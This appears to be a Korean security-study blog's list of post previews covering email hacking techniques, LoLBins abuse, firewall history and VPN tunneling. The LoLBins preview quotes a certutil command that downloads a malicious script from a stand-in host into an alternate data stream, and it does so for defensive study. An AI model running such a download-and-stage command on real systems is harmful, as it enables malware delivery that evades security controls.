보호되어 있는 글입니다.

1. 이메일을 전송한 클라이언트의 IP 주소를 확인할 수 있는 필드 : X-Originating-IP 2. 이메일을 이용한 해킹 기법 - 이메일 계정을 해킹하여 도용하는 EAC(email account compromise) - 이메일 계정 해킹 없이 발신자를 그럴듯하게 위장하는 스푸핑 - BEC(business email compromise): 피해자가 평소 신뢰하고 있던 이메일로부터 들어오는 사기 공격 3. 특정 개인의 이메일 계정을 해킹하는 기법? - 키 로깅 통해 사용자가 입력하는 id passwd 수집 - 피싱 메일 통해 타겟의 password 입력하도록 유도 - 메일 서버의 취약점 이용하여 사용자 인증 우회 4. Message ID 분석 - Message ID는 MUA(mail user agen..

1. LoL Bins를 악용한 공격 스크립트 분석 certutil.exe -urlcache -split -f https://example.com/mal.ps1 c:\temp:zip 1) urlcache 옵션은 인증기관 인증서 설치를 위해 사용한다. ▶ URL 캐시 항목을 표시 또는 삭제하는 역할 2) 다운로드 받은 스크립트 파일은 ADS영역에 저장 ▶https://lolbas-project.github.io/lolbas/Binaries/Certutil/ 3) 스크립트 파일은 c:\temp에 zip 형태로 저장. 4) certutil은 저장된 사용자 이름과 암호 또는 자격 증명을 만들어 나열하고 삭제하는 역할. ▶ Cmdkey.exe 2. LoL Bins들 나열.. 이들의 기능 설명 1) Cmdkey.ex..

보호되어 있는 글입니다.

보호되어 있는 글입니다.

이전 게시글과의 구분용 게시글

정보보호 장비의 발전. 사용하는 이유? 1. 처음에는 서버 단에서 접근제어를 하는 TCP Wrapper 같은 것을 사용하여 보안을 했을 것이다. /etc/hosts.allow /etc/hosts.deny 그러나 서버의 자원을 사용한, 호스트 기반의 보안은 한계가 존재한다. (hosy based Security, Text based Security) 2. 네트워크 단에서 접근을 차단할 수 있는 방화벽이 등장하였다. 4계층에 있는 정보를 기반으로, 4계층의 접근제어를 수행한다. ▶ L4방화벽 = 1세대 방화벽 = 패킷 필터링 방화벽 IP와 port 기반으로 필터링하고, 필터링을 해야 하기 때문에 "인라인 방식"으로 동작한다. 룰과 정책으로 Inbound/Outbound 에 대해서 Allow/Deny 인라인 ..

VPN 터널링 프로토콜 호환이 되지않는 망을 통해 다른 망으로 데이터를 전달 시 사용되는 네트워크 트래픽 전송 기술 라우팅이 되지 않는 비 표준 프로톸콜 패킷을 터널링을 사용하여 원격지의 컴퓨터로 전달할 수 있다. 평문 프로토콜에 암호화 기능을 추가하기 위해 사용 ▶ 암호화 프로토콜이 없는 패킷을 SSH 터널링을 이용하여 암호화 터널링 3 요소 1) Passenger Protocol 전송하고자 하는 데이터를 담고 있는 프로토콜 2) Encapsulating Protocol 패킷으 Encapsulating / Decapsulaing 하기 위한 프로토콜 Ex) GRE, PPTP, L2TP, L2F, IPSec 3) Carrier Protocol - Encapsulating된 패킷을 운반하기 위한 프로토콜 -..